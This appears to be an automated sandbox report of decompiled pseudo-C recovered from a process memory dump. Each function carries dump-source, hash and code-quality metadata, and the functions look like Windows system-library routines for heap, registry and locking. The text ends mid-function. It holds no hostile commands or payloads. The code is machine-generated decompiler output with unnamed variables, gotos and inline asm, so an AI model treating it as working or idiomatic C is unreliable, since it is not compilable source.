            				_v8 =  *0x451d360 ^ _t255;
            				_v32 = _v32 & 0x00000000;
            				_t251 = __edx;
            				_t237 = __ecx;
            				_t212 = 6;
            				_t245 =  &_v84;
            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
            				_v48 = __ecx;
            				_v36 = _t207;
            				_t157 = memset(_t245, 0, _t212 << 2);
            				_t256 = _t255 + 0xc;
            				_t246 = _t245 + _t212;
            				if(_t207 == 2) {
            					_t247 =  *(_t237 + 0x60);
            					_t208 =  *(_t237 + 0x64);
            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
            					_v104 = _t159;
            					_v76 = _t159;
            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
            					_v100 = _t160;
            					_v72 = _t160;
            					L19:
            					_v80 = _t208;
            					_v84 = _t247;
            					L8:
            					_t214 = 0;
            					if( *(_t237 + 0x74) > 0) {
            						_t82 = _t237 + 0x84; // 0x124
            						_t161 = _t82;
            						_v92 = _t161;
            						while( *_t161 >> 0x1f != 0) {
            							_t200 = _v92;
            							if( *_t200 == 0x80000000) {
            								break;
            							}
            							_t214 = _t214 + 1;
            							_t161 = _t200 + 0x10;
            							_v92 = _t161;
            							if(_t214 <  *(_t237 + 0x74)) {
            								continue;
            							}
            							goto L9;
            						}
            						_v88 = _t214 << 4;
            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
            						_t165 = 0;
            						asm("adc eax, [ecx+edx+0x7c]");
            						_v24 = _t165;
            						_v28 = _v40;
            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
            						_t221 = _v40;
            						_v16 =  *_v92;
            						_v32 =  &_v28;
            						if( *(_t237 + 0x4e) >> 0xf == 0) {
            							goto L9;
            						}
            						_t240 = _v48;
            						if( *_v92 != 0x80000000) {
            							goto L9;
            						}
            						 *((intOrPtr*)(_t221 + 8)) = 0;
            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
            						_t226 = 0;
            						_t181 = _t251 + 0x66;
            						_v88 = 0;
            						_v92 = _t181;
            						do {
            							if( *((char*)(_t181 - 2)) == 0) {
            								goto L31;
            							}
            							_t226 = _v88;
            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
            								_t181 = E0446D0F0(1, _t226 + 0x20, 0);
            								_t226 = _v40;
            								 *(_t226 + 8) = _t181;
            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
            								L34:
            								if(_v44 == 0) {
            									goto L9;
            								}
            								_t210 = _v44;
            								_t127 = _t210 + 0x1c; // 0x1c
            								_t249 = _t127;
            								E04442280(_t181, _t127);
            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
            									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
            								}
            								_t189 = L04444620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
            								if(_t189 != 0) {
            									 *((intOrPtr*)(_t189 + 8)) = _v20;
            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
            									 *_t232 = _t232 + 0x10;
            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
            									E0446F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
            									_t256 = _t256 + 0xc;
            								}
            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
            								E0443FFB0(_t210, _t249, _t249);
            								_t222 = _v76;
            								_t172 = _v80;
            								_t208 = _v84;
            								_t247 = _v88;
            								L10:
            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
            								_v44 = _t238;
            								if(_t238 != 0) {
            									 *0x451b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
            									_v44();
            								}
            								_pop(_t248);
            								_pop(_t252);
            								_pop(_t209);
            								return E0446B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
            							}
            							_t181 = _v92;
            							L31:
            							_t226 = _t226 + 1;
            							_t181 =  &(_t181[0x18]);
            							_v88 = _t226;
            							_v92 = _t181;
            						} while (_t226 < 4);
            						goto L34;
            					}
            					L9:
            					_t172 = _v104;
            					_t222 = _v100;
            					goto L10;
            				}
            				_t247 = _t246 | 0xffffffff;
            				_t208 = _t247;
            				_v84 = _t247;
            				_v80 = _t208;
            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
            					_t233 = _v72;
            					_v105 = _v64;
            					_t202 = _v76;
            				} else {
            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
            					_v105 = 1;
            					if(_v63 <= _t204) {
            						_v63 = _t204;
            					}
            					_t202 = _v76 |  *(_t251 + 0x40);
            					_t233 = _v72 |  *(_t251 + 0x44);
            					_t247 =  *(_t251 + 0x38);
            					_t208 =  *(_t251 + 0x3c);
            					_v76 = _t202;
            					_v72 = _t233;
            					_v84 = _t247;
            					_v80 = _t208;
            				}
            				_v104 = _t202;
            				_v100 = _t233;
            				if( *((char*)(_t251 + 0xc4)) != 0) {
            					_t237 = _v48;
            					_v105 = 1;
            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
            						_t237 = _v48;
            					}
            					_t203 = _t202 |  *(_t251 + 0xb8);
            					_t234 = _t233 |  *(_t251 + 0xbc);
            					_t247 = _t247 &  *(_t251 + 0xb0);
            					_t208 = _t208 &  *(_t251 + 0xb4);
            					_v104 = _t203;
            					_v76 = _t203;
            					_v100 = _t234;
            					_v72 = _t234;
            					_v84 = _t247;
            					_v80 = _t208;
            				}
            				if(_v105 == 0) {
            					_v36 = _v36 & 0x00000000;
            					_t208 = 0;
            					_t247 = 0;
            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
            					goto L19;
            				} else {
            					_v36 = 1;
            					goto L8;
            				}
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 42c0bab29cfcce9d9f433104e9ee3d1850ef130b9990f83e4003debfe4493f14
            • Instruction ID: fba2c1835f5953f5bf4970a3c636f58ed5bdcddbcaa0e215e3828e07a9ad96fe
            • Opcode Fuzzy Hash: 42c0bab29cfcce9d9f433104e9ee3d1850ef130b9990f83e4003debfe4493f14
            • Instruction Fuzzy Hash: C6C113755083819FDB54CF28C580A6AFBF1BF88308F144A6EF8998B362D775E945CB42
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E0442C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
            				signed int _v8;
            				char _v1036;
            				signed int _v1040;
            				char _v1048;
            				signed int _v1052;
            				signed char _v1056;
            				void* _v1058;
            				char _v1060;
            				signed int _v1064;
            				void* _v1068;
            				intOrPtr _v1072;
            				void* _v1084;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t70;
            				intOrPtr _t72;
            				signed int _t74;
            				intOrPtr _t77;
            				signed int _t78;
            				signed int _t81;
            				void* _t101;
            				signed int _t102;
            				signed int _t107;
            				signed int _t109;
            				signed int _t110;
            				signed char _t111;
            				signed int _t112;
            				signed int _t113;
            				signed int _t114;
            				intOrPtr _t116;
            				void* _t117;
            				char _t118;
            				void* _t120;
            				char _t121;
            				signed int _t122;
            				signed int _t123;
            				signed int _t125;
            
            				_t125 = (_t123 & 0xfffffff8) - 0x424;
            				_v8 =  *0x451d360 ^ _t125;
            				_t116 = _a4;
            				_v1056 = _a16;
            				_v1040 = _a24;
            				if(E04436D30( &_v1048, _a8) < 0) {
            					L4:
            					_pop(_t117);
            					_pop(_t120);
            					_pop(_t101);
            					return E0446B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
            				}
            				_t70 = _a20;
            				if(_t70 >= 0x3f4) {
            					_t121 = _t70 + 0xc;
            					L19:
            					_t107 =  *( *[fs:0x30] + 0x18);
            					__eflags = _t107;
            					if(_t107 == 0) {
            						L60:
            						_t68 = 0xc0000017;
            						goto L4;
            					}
            					_t72 =  *0x4517b9c; // 0x0
            					_t74 = L04444620(_t107, _t107, _t72 + 0x180000, _t121);
            					_v1064 = _t74;
            					__eflags = _t74;
            					if(_t74 == 0) {
            						goto L60;
            					}
            					_t102 = _t74;
            					_push( &_v1060);
            					_push(_t121);
            					_push(_t74);
            					_push(2);
            					_push( &_v1048);
            					_push(_t116);
            					_t122 = E04469650();
            					__eflags = _t122;
            					if(_t122 >= 0) {
            						L7:
            						_t114 = _a12;
            						__eflags = _t114;
            						if(_t114 != 0) {
            							_t77 = _a20;
            							L26:
            							_t109 =  *(_t102 + 4);
            							__eflags = _t109 - 3;
            							if(_t109 == 3) {
            								L55:
            								__eflags = _t114 - _t109;
            								if(_t114 != _t109) {
            									L59:
            									_t122 = 0xc0000024;
            									L15:
            									_t78 = _v1052;
            									__eflags = _t78;
            									if(_t78 != 0) {
            										L044477F0( *( *[fs:0x30] + 0x18), 0, _t78);
            									}
            									_t68 = _t122;
            									goto L4;
            								}
            								_t110 = _v1056;
            								_t118 =  *((intOrPtr*)(_t102 + 8));
            								_v1060 = _t118;
            								__eflags = _t110;
            								if(_t110 == 0) {
            									L10:
            									_t122 = 0x80000005;
            									L11:
            									_t81 = _v1040;
            									__eflags = _t81;
            									if(_t81 == 0) {
            										goto L15;
            									}
            									__eflags = _t122;
            									if(_t122 >= 0) {
            										L14:
            										 *_t81 = _t118;
            										goto L15;
            									}
            									__eflags = _t122 - 0x80000005;
            									if(_t122 != 0x80000005) {
            										goto L15;
            									}
            									goto L14;
            								}
            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
            								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
            									goto L10;
            								}
            								_push( *((intOrPtr*)(_t102 + 8)));
            								_t59 = _t102 + 0xc; // 0xc
            								_push(_t110);
            								L54:
            								E0446F3E0();
            								_t125 = _t125 + 0xc;
            								goto L11;
            							}
            							__eflags = _t109 - 7;
            							if(_t109 == 7) {
            								goto L55;
            							}
            							_t118 = 4;
            							__eflags = _t109 - _t118;
            							if(_t109 != _t118) {
            								__eflags = _t109 - 0xb;
            								if(_t109 != 0xb) {
            									__eflags = _t109 - 1;
            									if(_t109 == 1) {
            										__eflags = _t114 - _t118;
            										if(_t114 != _t118) {
            											_t118 =  *((intOrPtr*)(_t102 + 8));
            											_v1060 = _t118;
            											__eflags = _t118 - _t77;
            											if(_t118 > _t77) {
            												goto L10;
            											}
            											_push(_t118);
            											_t56 = _t102 + 0xc; // 0xc
            											_push(_v1056);
            											goto L54;
            										}
            										__eflags = _t77 - _t118;
            										if(_t77 != _t118) {
            											L34:
            											_t122 = 0xc0000004;
            											goto L15;
            										}
            										_t111 = _v1056;
            										__eflags = _t111 & 0x00000003;
            										if((_t111 & 0x00000003) == 0) {
            											_v1060 = _t118;
            											__eflags = _t111;
            											if(__eflags == 0) {
            												goto L10;
            											}
            											_t42 = _t102 + 0xc; // 0xc
            											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
            											_v1048 =  *((intOrPtr*)(_t102 + 8));
            											_push(_t111);
            											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
            											_push(0);
            											_push( &_v1048);
            											_t122 = E044613C0(_t102, _t118, _t122, __eflags);
            											L44:
            											_t118 = _v1072;
            											goto L11;
            										}
            										_t122 = 0x80000002;
            										goto L15;
            									}
            									_t122 = 0xc0000024;
            									goto L44;
            								}
            								__eflags = _t114 - _t109;
            								if(_t114 != _t109) {
            									goto L59;
            								}
            								_t118 = 8;
            								__eflags = _t77 - _t118;
            								if(_t77 != _t118) {
            									goto L34;
            								}
            								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
            								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
            									goto L34;
            								}
            								_t112 = _v1056;
            								_v1060 = _t118;
            								__eflags = _t112;
            								if(_t112 == 0) {
            									goto L10;
            								}
            								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
            								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
            								goto L11;
            							}
            							__eflags = _t114 - _t118;
            							if(_t114 != _t118) {
            								goto L59;
            							}
            							__eflags = _t77 - _t118;
            							if(_t77 != _t118) {
            								goto L34;
            							}
            							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
            							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
            								goto L34;
            							}
            							_t113 = _v1056;
            							_v1060 = _t118;
            							__eflags = _t113;
            							if(_t113 == 0) {
            								goto L10;
            							}
            							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
            							goto L11;
            						}
            						_t118 =  *((intOrPtr*)(_t102 + 8));
            						__eflags = _t118 - _a20;
            						if(_t118 <= _a20) {
            							_t114 =  *(_t102 + 4);
            							_t77 = _t118;
            							goto L26;
            						}
            						_v1060 = _t118;
            						goto L10;
            					}
            					__eflags = _t122 - 0x80000005;
            					if(_t122 != 0x80000005) {
            						goto L15;
            					}
            					L044477F0( *( *[fs:0x30] + 0x18), 0, _t102);
            					L18:
            					_t121 = _v1060;
            					goto L19;
            				}
            				_push( &_v1060);
            				_push(0x400);
            				_t102 =  &_v1036;
            				_push(_t102);
            				_push(2);
            				_push( &_v1048);
            				_push(_t116);
            				_t122 = E04469650();
            				if(_t122 >= 0) {
            					__eflags = 0;
            					_v1052 = 0;
            					goto L7;
            				}
            				if(_t122 == 0x80000005) {
            					goto L18;
            				}
            				goto L4;
            			}











































            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 77b4a317bcb6c4ef4f77b107d22d4b6211e085ccf94fb73cbe40650093d69da6
            • Instruction ID: ccac49edf67ef52e0b686f0c1957062332f724a52dbe5e86e71de80704f28cc1
            • Opcode Fuzzy Hash: 77b4a317bcb6c4ef4f77b107d22d4b6211e085ccf94fb73cbe40650093d69da6
            • Instruction Fuzzy Hash: 3E815875624201DBDF25CE14C884A6BBBE4EF84354F14496FE9469B341E330FD45EBA2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E044BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
            				char _v8;
            				signed int _v12;
            				signed int _t80;
            				signed int _t83;
            				intOrPtr _t89;
            				signed int _t92;
            				signed char _t106;
            				signed int* _t107;
            				intOrPtr _t108;
            				intOrPtr _t109;
            				signed int _t114;
            				void* _t115;
            				void* _t117;
            				void* _t119;
            				void* _t122;
            				signed int _t123;
            				signed int* _t124;
            
            				_t106 = _a12;
            				if((_t106 & 0xfffffffc) != 0) {
            					return 0xc000000d;
            				}
            				if((_t106 & 0x00000002) != 0) {
            					_t106 = _t106 | 0x00000001;
            				}
            				_t109 =  *0x4517b9c; // 0x0
            				_t124 = L04444620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
            				if(_t124 != 0) {
            					 *_t124 =  *_t124 & 0x00000000;
            					_t124[1] = _t124[1] & 0x00000000;
            					_t124[4] = _t124[4] & 0x00000000;
            					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
            						L13:
            						_push(_t124);
            						if((_t106 & 0x00000002) != 0) {
            							_push(0x200);
            							_push(0x28);
            							_push(0xffffffff);
            							_t122 = E04469800();
            							if(_t122 < 0) {
            								L33:
            								if((_t124[4] & 0x00000001) != 0) {
            									_push(4);
            									_t64 =  &(_t124[1]); // 0x4
            									_t107 = _t64;
            									_push(_t107);
            									_push(5);
            									_push(0xfffffffe);
            									E044695B0();
            									if( *_t107 != 0) {
            										_push( *_t107);
            										E044695D0();
            									}
            								}
            								_push(_t124);
            								_push(0);
            								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
            								L37:
            								L044477F0();
            								return _t122;
            							}
            							_t124[4] = _t124[4] | 0x00000002;
            							L18:
            							_t108 = _a8;
            							_t29 =  &(_t124[0x105]); // 0x414
            							_t80 = _t29;
            							_t30 =  &(_t124[5]); // 0x14
            							_t124[3] = _t80;
            							_t123 = 0;
            							_t124[2] = _t30;
            							 *_t80 = _t108;
            							if(_t108 == 0) {
            								L21:
            								_t112 = 0x400;
            								_push( &_v8);
            								_v8 = 0x400;
            								_push(_t124[2]);
            								_push(0x400);
            								_push(_t124[3]);
            								_push(0);
            								_push( *_t124);
            								_t122 = E04469910();
            								if(_t122 != 0xc0000023) {
            									L26:
            									if(_t122 != 0x106) {
            										L40:
            										if(_t122 < 0) {
            											L29:
            											_t83 = _t124[2];
            											if(_t83 != 0) {
            												_t59 =  &(_t124[5]); // 0x14
            												if(_t83 != _t59) {
            													L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
            												}
            											}
            											_push( *_t124);
            											E044695D0();
            											goto L33;
            										}
            										 *_a16 = _t124;
            										return 0;
            									}
            									if(_t108 != 1) {
            										_t122 = 0;
            										goto L40;
            									}
            									_t122 = 0xc0000061;
            									goto L29;
            								} else {
            									goto L22;
            								}
            								while(1) {
            									L22:
            									_t89 =  *0x4517b9c; // 0x0
            									_t92 = L04444620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
            									_t124[2] = _t92;
            									if(_t92 == 0) {
            										break;
            									}
            									_t112 =  &_v8;
            									_push( &_v8);
            									_push(_t92);
            									_push(_v8);
            									_push(_t124[3]);
            									_push(0);
            									_push( *_t124);
            									_t122 = E04469910();
            									if(_t122 != 0xc0000023) {
            										goto L26;
            									}
            									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
            								}
            								_t122 = 0xc0000017;
            								goto L26;
            							}
            							_t119 = 0;
            							do {
            								_t114 = _t124[3];
            								_t119 = _t119 + 0xc;
            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
            								_t123 = _t123 + 1;
            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
            							} while (_t123 < _t108);
            							goto L21;
            						}
            						_push(0x28);
            						_push(3);
            						_t122 = E0442A7B0();
            						if(_t122 < 0) {
            							goto L33;
            						}
            						_t124[4] = _t124[4] | 0x00000001;
            						goto L18;
            					}
            					if((_t106 & 0x00000001) == 0) {
            						_t115 = 0x28;
            						_t122 = E044BE7D3(_t115, _t124);
            						if(_t122 < 0) {
            							L9:
            							_push(_t124);
            							_push(0);
            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
            							goto L37;
            						}
            						L12:
            						if( *_t124 != 0) {
            							goto L18;
            						}
            						goto L13;
            					}
            					_t15 =  &(_t124[1]); // 0x4
            					_t117 = 4;
            					_t122 = E044BE7D3(_t117, _t15);
            					if(_t122 >= 0) {
            						_t124[4] = _t124[4] | 0x00000001;
            						_v12 = _v12 & 0x00000000;
            						_push(4);
            						_push( &_v12);
            						_push(5);
            						_push(0xfffffffe);
            						E044695B0();
            						goto L12;
            					}
            					goto L9;
            				} else {
            					return 0xc0000017;
            				}
            			}





















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d1c7ae312f158749879eaba83c86c2f14bb3f3163fbbf33ea7b3579505f36445
            • Instruction ID: bfd3476b7835b73f552c0a7eb28e8519e465be79b8b982329d8adef919f7c85b
            • Opcode Fuzzy Hash: d1c7ae312f158749879eaba83c86c2f14bb3f3163fbbf33ea7b3579505f36445
            • Instruction Fuzzy Hash: 27713332200B41EFEF31CF15C840F96B7A5EB44724F10492EE69587AA1EBB4F905DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E044252A5(char __ecx) {
            				char _v20;
            				char _v28;
            				char _v29;
            				void* _v32;
            				void* _v36;
            				void* _v37;
            				void* _v38;
            				void* _v40;
            				void* _v46;
            				void* _v64;
            				void* __ebx;
            				intOrPtr* _t49;
            				signed int _t53;
            				short _t85;
            				signed int _t87;
            				signed int _t88;
            				signed int _t89;
            				intOrPtr _t101;
            				intOrPtr* _t102;
            				intOrPtr* _t104;
            				signed int _t106;
            				void* _t108;
            
            				_t93 = __ecx;
            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
            				_push(_t88);
            				_v29 = __ecx;
            				_t89 = _t88 | 0xffffffff;
            				while(1) {
            					E0443EEF0(0x45179a0);
            					_t104 =  *0x4518210; // 0x172cb8
            					if(_t104 == 0) {
            						break;
            					}
            					asm("lock inc dword [esi]");
            					_t2 = _t104 + 8; // 0x2e000000
            					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
            					E0443EB70(_t93, 0x45179a0);
            					if( *((char*)(_t108 + 0xf)) != 0) {
            						_t101 =  *0x7ffe02dc;
            						__eflags =  *(_t104 + 0x14) & 0x00000001;
            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
            							L9:
            							_push(0);
            							_push(0);
            							_push(0);
            							_push(0);
            							_push(0x90028);
            							_push(_t108 + 0x20);
            							_push(0);
            							_push(0);
            							_push(0);
            							_t10 = _t104 + 4; // 0x0
            							_push( *_t10);
            							_t53 = E04469890();
            							__eflags = _t53;
            							if(_t53 >= 0) {
            								__eflags =  *(_t104 + 0x14) & 0x00000001;
            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
            									E0443EEF0(0x45179a0);
            									 *((intOrPtr*)(_t104 + 8)) = _t101;
            									E0443EB70(0, 0x45179a0);
            								}
            								goto L3;
            							}
            							__eflags = _t53 - 0xc0000012;
            							if(__eflags == 0) {
            								L12:
            								_t11 = _t104 + 0xe; // 0x172cd002
            								_t13 = _t104 + 0xc; // 0x172cc5
            								_t93 = _t13;
            								 *((char*)(_t108 + 0x12)) = 0;
            								__eflags = E0445F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
            								if(__eflags >= 0) {
            									L15:
            									_t102 = _v28;
            									 *_t102 = 2;
            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
            									E0443EEF0(0x45179a0);
            									__eflags =  *0x4518210 - _t104; // 0x172cb8
            									if(__eflags == 0) {
            										__eflags =  *((char*)(_t108 + 0xe));
            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
            										 *0x4518210 = _t102;
            										_t32 = _t102 + 0xc; // 0x0
            										 *_t95 =  *_t32;
            										_t33 = _t102 + 0x10; // 0x0
            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
            										_t35 = _t102 + 4; // 0xffffffff
            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
            										if(__eflags != 0) {
            											_t37 = _t104 + 0x10; // 0x2000172c
            											_t95 =  *((intOrPtr*)( *_t37));
            											E044A4888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
            										}
            										E0443EB70(_t95, 0x45179a0);
            										asm("lock xadd [esi], eax");
            										if(__eflags == 0) {
            											_t38 = _t104 + 4; // 0x0
            											_push( *_t38);
            											E044695D0();
            											L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
            										}
            										asm("lock xadd [esi], ebx");
            										__eflags = _t89 == 1;
            										if(_t89 == 1) {
            											_t41 = _t104 + 4; // 0x0
            											_push( *_t41);
            											E044695D0();
            											L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
            										}
            										_t49 = _t102;
            										L4:
            										return _t49;
            									}
            									E0443EB70(_t93, 0x45179a0);
            									asm("lock xadd [esi], eax");
            									if(__eflags == 0) {
            										_t25 = _t104 + 4; // 0x0
            										_push( *_t25);
            										E044695D0();
            										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
            									}
            									 *_t102 = 1;
            									asm("lock xadd [edi], eax");
            									if(__eflags == 0) {
            										_t28 = _t102 + 4; // 0xffffffff
            										_push( *_t28);
            										E044695D0();
            										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
            									}
            									continue;
            								}
            								_t15 = _t104 + 0x10; // 0x2000172c
            								_t93 =  &_v20;
            								_t17 = _t104 + 0xe; // 0x172cd002
            								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
            								_t85 = 6;
            								_v20 = _t85;
            								_t87 = E0445F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
            								__eflags = _t87;
            								if(_t87 < 0) {
            									goto L3;
            								}
            								 *((char*)(_t108 + 0xe)) = 1;
            								goto L15;
            							}
            							__eflags = _t53 - 0xc000026e;
            							if(__eflags != 0) {
            								goto L3;
            							}
            							goto L12;
            						}
            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
            							goto L3;
            						} else {
            							goto L9;
            						}
            					}
            					L3:
            					_t49 = _t104;
            					goto L4;
            				}
            				_t49 = 0;
            				goto L4;
            			}


























            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a8f93b05f1ad81be4f599962f994da37aaaad88ba376759bd79d4659037636af
            • Instruction ID: 9fe105c7352bcc214dab742602720187af38e0b5d780065a6c0fdfd7463f3c01
            • Opcode Fuzzy Hash: a8f93b05f1ad81be4f599962f994da37aaaad88ba376759bd79d4659037636af
            • Instruction Fuzzy Hash: 6B51DF71205741ABEB21EF29C940B2BBBE4FF44714F14491FE49587662E774F809CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E0443EF40(intOrPtr __ecx) {
            				char _v5;
            				char _v6;
            				char _v7;
            				char _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t58;
            				char _t59;
            				signed char _t69;
            				void* _t73;
            				signed int _t74;
            				char _t79;
            				signed char _t81;
            				signed int _t85;
            				signed int _t87;
            				intOrPtr _t90;
            				signed char* _t91;
            				void* _t92;
            				signed int _t94;
            				void* _t96;
            
            				_t90 = __ecx;
            				_v16 = __ecx;
            				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
            					_t58 =  *((intOrPtr*)(__ecx));
            					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
            						E04429080(_t73, __ecx, __ecx, _t92);
            					}
            				}
            				_t74 = 0;
            				_t96 =  *0x7ffe036a - 1;
            				_v12 = 0;
            				_v7 = 0;
            				if(_t96 > 0) {
            					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
            					_v12 = _t74;
            					_v7 = _t96 != 0;
            				}
            				_t79 = 0;
            				_v8 = 0;
            				_v5 = 0;
            				while(1) {
            					L4:
            					_t59 = 1;
            					L5:
            					while(1) {
            						if(_t59 == 0) {
            							L12:
            							_t21 = _t90 + 4; // 0x775ec21e
            							_t87 =  *_t21;
            							_v6 = 0;
            							if(_t79 != 0) {
            								if((_t87 & 0x00000002) != 0) {
            									goto L19;
            								}
            								if((_t87 & 0x00000001) != 0) {
            									_v6 = 1;
            									_t74 = _t87 ^ 0x00000003;
            								} else {
            									_t51 = _t87 - 2; // -2
            									_t74 = _t51;
            								}
            								goto L15;
            							} else {
            								if((_t87 & 0x00000001) != 0) {
            									_v6 = 1;
            									_t74 = _t87 ^ 0x00000001;
            								} else {
            									_t26 = _t87 - 4; // -4
            									_t74 = _t26;
            									if((_t74 & 0x00000002) == 0) {
            										_t74 = _t74 - 2;
            									}
            								}
            								L15:
            								if(_t74 == _t87) {
            									L19:
            									E04422D8A(_t74, _t90, _t87, _t90);
            									_t74 = _v12;
            									_v8 = 1;
            									if(_v7 != 0 && _t74 > 0x64) {
            										_t74 = _t74 - 1;
            										_v12 = _t74;
            									}
            									_t79 = _v5;
            									goto L4;
            								}
            								asm("lock cmpxchg [esi], ecx");
